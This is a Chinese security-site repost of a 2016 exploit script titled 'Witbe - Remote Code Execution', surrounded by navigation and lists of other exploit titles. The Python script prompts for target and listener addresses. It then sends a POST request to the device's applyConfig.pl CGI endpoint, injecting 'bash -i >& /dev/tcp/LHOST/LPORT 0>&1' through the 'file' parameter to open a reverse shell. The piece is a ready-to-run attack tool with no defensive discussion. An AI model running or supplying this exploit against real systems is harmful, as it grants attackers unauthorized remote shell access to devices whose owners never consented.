首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Witbe - Remote Code Execution
来源:hb.mz093@gmail.com 作者:BeLmar 发布时间:2016-10-08  

#!/usr/bin/python
# Exploit Title: Witbe RCE (Remote Code Execution)
# Exploit Author: BeLmar
# Date: 05/10/2016
# DEMO : https://youtu.be/ooUFXfUfIs0
# Contact : hb.mz093@gmail.com
# Vendor Homepage: http://www.witbe.net
# Tested on: Windows7/10 & BackBox
# Category: Remote Exploits

import urllib
import urllib2
import os

print " M    MW    M  M  XXMMrX, 2Mr72S   MW7XS"                            
print " MM   MM   M2  M    SM    MM   MM  M    "                            
print "  M  M ZM  M   M    XM    MMir0M   MMrXS"                             
print "  MM M  M M:   M    SM    MM   ZM  M2   "                            
print "   MMa  MMM    M    ZM    MM   XM  M    "                             
print "   XM    M     M    iM    8MZ8W8   MM8BB"
print "             EXPLOIT BY BELMAR          "
print ""

print "Run NetCat Listner" # First Run Netcat Listner

rhost = raw_input('RHOST: ')
lhost = raw_input('LHOST: ')
lport = raw_input('LPORT: ')

url = 'http://'+rhost+'/cgi-bin/applyConfig.pl'
user_agent = 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36'
values = {'auth_login': '', #Leave it as it is
          'auth_pwd': '',   #Leave it as it is
          'file': 'set|bash -i >& /dev/tcp/'+lhost+'/'+lport+' 0>&1' }

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
the_page = response.read()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Disk Savvy Enterprise 9.0.32 -
·Billion Router 7700NR4 - Remot
·Disk Sorter Enterprise 9.0.24
·Apache Tomcat 8/7/6 (RedHat-Ba
·Dup Scout Enterprise 9.0.28 -
·HP Client - Automation Command
·Sync Breeze Enterprise 8.9.24
·Allwinner 3.4 Legacy Kernel Lo
·VX Search Enterprise 9.0.26 -
·Linux Kernel 3.13.1 Recvmmsg P
·ISC BIND 9 - Denial of Service
·Powershell Payload Execution
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved